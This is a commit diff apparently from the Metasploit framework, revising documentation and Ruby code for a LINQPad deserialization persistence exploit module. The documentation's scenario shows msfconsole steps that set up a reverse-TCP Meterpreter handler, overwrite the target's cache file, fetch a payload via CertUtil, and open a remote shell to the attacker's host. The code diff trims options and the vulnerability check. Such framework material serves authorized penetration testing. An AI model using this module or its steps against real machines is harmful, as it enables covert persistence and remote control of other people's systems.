Fixes documentation, removes unused parameters, code cleanup

msutovsky-r7 · msutovsky-r7 · commit 44c3d9b5dbca · 2025-10-29T07:58:47.000+01:00
diff --git a/documentation/modules/exploit/windows/persistence/linqpad_deserialization.md b/documentation/modules/exploit/windows/persistence/linqpad_deserialization.md
@@ -1,53 +1,53 @@
 ## Vulnerable Application
 
-LINQPad is a scratchpad for .NET programming. Versions prior to 5.52.01 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from [here](https://www.linqpad.net/LINQPad5.aspx).
+LINQPad is a scratchpad for .NET programming.
+Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting.
+Application can be downloaded from [here](https://www.linqpad.net/).
+
 
 ## Verification Steps
 
 1. Install the application
 2. Start msfconsole
-3. Get Meterpreter/cmd shell
-4. Run: `use windows/local/linqpad_deserialization_persistence`
+3. Get session
+4. Run: `use windows/local/linqpad_deserialization`
 5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters
 6. Set parameters `session`, `cache_path`, `linqpad_path`, `cleanup`
 7. Run exploit
 
 ## Options
 
-### cleanup
-
-Enable cleanup of malicious file. The module will replace cache filewith malicious content. If `cleanup` is enabled, after successful execution, the module will remove malicious cache file. The original file will be restored upon re-execution of Linqpad.
 
 ### cache\_path
 
-The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file. 
-
-### linqpad\_path
+The parameter sets path for folder, where vulnerable cache file is present.
+This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file.
 
-Final part of exploit runs the LINQPad to trigger deserialization procedure. The `linpad_path` parameter sets the path to LINQPad binary, which is ran at the end of exploit.
 
 ## Scenarios
 
 ```
 msf > use exploit/multi/handler
-msf exploit(multi/handler) > set LHOST 192.168.95.128
-msf exploit(multi/handler) > set LPORT 4242
+msf exploit(multi/handler) > set LHOST 192.168.3.7
+msf exploit(multi/handler) > set LPORT 4545
 msf exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
-msf exploit(multi/handler) > run
-[*] Started reverse TCP handler on 192.168.95.128:4242 
-[*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100
-
-meterpreter > background
-[*] Backgrounding session 1...
-msf exploit(multi/handler) > use windows/local/linqpad_deserialization_persistence
-msf exploit(windows/local/linqpad_deserialization_persistence) > set LINQPAD_FILE C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe
-msf exploit(windows/local/linqpad_deserialization_persistence) > set payload windows/exec/cmd
-msf exploit(windows/local/linqpad_deserialization_persistence) > set cache_path C:/Users/ms/AppData/Local/LINQPad
-msf exploit(windows/local/linqpad_deserialization_persistence) > set CMD calc.exe
-msf exploit(windows/local/linqpad_deserialization_persistence) > set session 1
-msf exploit(windows/local/linqpad_deserialization_persistence) > exploit
 [*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/linqpad_deserialization_persistence) >
+[*] Fetch handler listening on 192.168.3.7:8080
+[*] HTTP server started
+[*] Adding resource /LCG8z8xZZXJnz_uKNIZRPw
+[*] Started reverse TCP handler on 192.168.3.7:4545
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. LINPad and vulnerable cache file present, target possibly exploitable
+[*] Create deserialization payload
+[*] Saving the original content
+[*] Saved at: /home/ms/.msf4/loot/20251027153340_default_10.5.132.148_CUsersmsfuser_949460.txt
+[*] Overwriting file
+[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/WIN10_1909_BE09_20251027.3341/WIN10_1909_BE09_20251027.3341.rc
+[*] Client 10.5.132.148 requested /LCG8z8xZZXJnz_uKNIZRPw
+[*] Sending payload to 10.5.132.148 (Microsoft-CryptoAPI/10.0)
+[*] Client 10.5.132.148 requested /LCG8z8xZZXJnz_uKNIZRPw
+[*] Sending payload to 10.5.132.148 (CertUtil URL Agent)
+[*] Sending stage (203846 bytes) to 10.5.132.148
+[*] Meterpreter session 2 opened (192.168.3.7:4545 -> 10.5.132.148:50045) at 2025-10-27 15:33:53 +0100
 ```
-
-Previous example will run `calc.exe` when LINQPad will start.
-
diff --git a/modules/exploits/windows/persistence/linqpad_deserialization.rb b/modules/exploits/windows/persistence/linqpad_deserialization.rb
@@ -19,7 +19,7 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'LINQPad Deserialization Exploit',
+        'Name' => 'LINQPad Deserialization',
         'Description' => %q{
           This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.
         },
@@ -46,17 +46,14 @@ def initialize(info = {})
       )
     )
     register_options([
-      OptString.new('LINQPAD_FILE', [true, 'Path to LINQPad executable on target\'s machine']),
       OptString.new('CACHE_PATH', [true, 'Path to cache file directory containing deserialized data']),
     ])
   end
 
   # Simplify pulling the writable directory variable
 
   def check
-    if datastore['LINQPAD_FILE'].blank? || !file?(datastore['LINQPAD_FILE'])
-      return Exploit::CheckCode::Safe('LINQPad binary not specified or doesn\'t exist')
-    elsif datastore['CACHE_PATH'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
+    if !directory?(datastore['Cache_path']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
       return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist')
     elsif !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
       return Exploit::CheckCode::Unknown('Cannot find cache file')
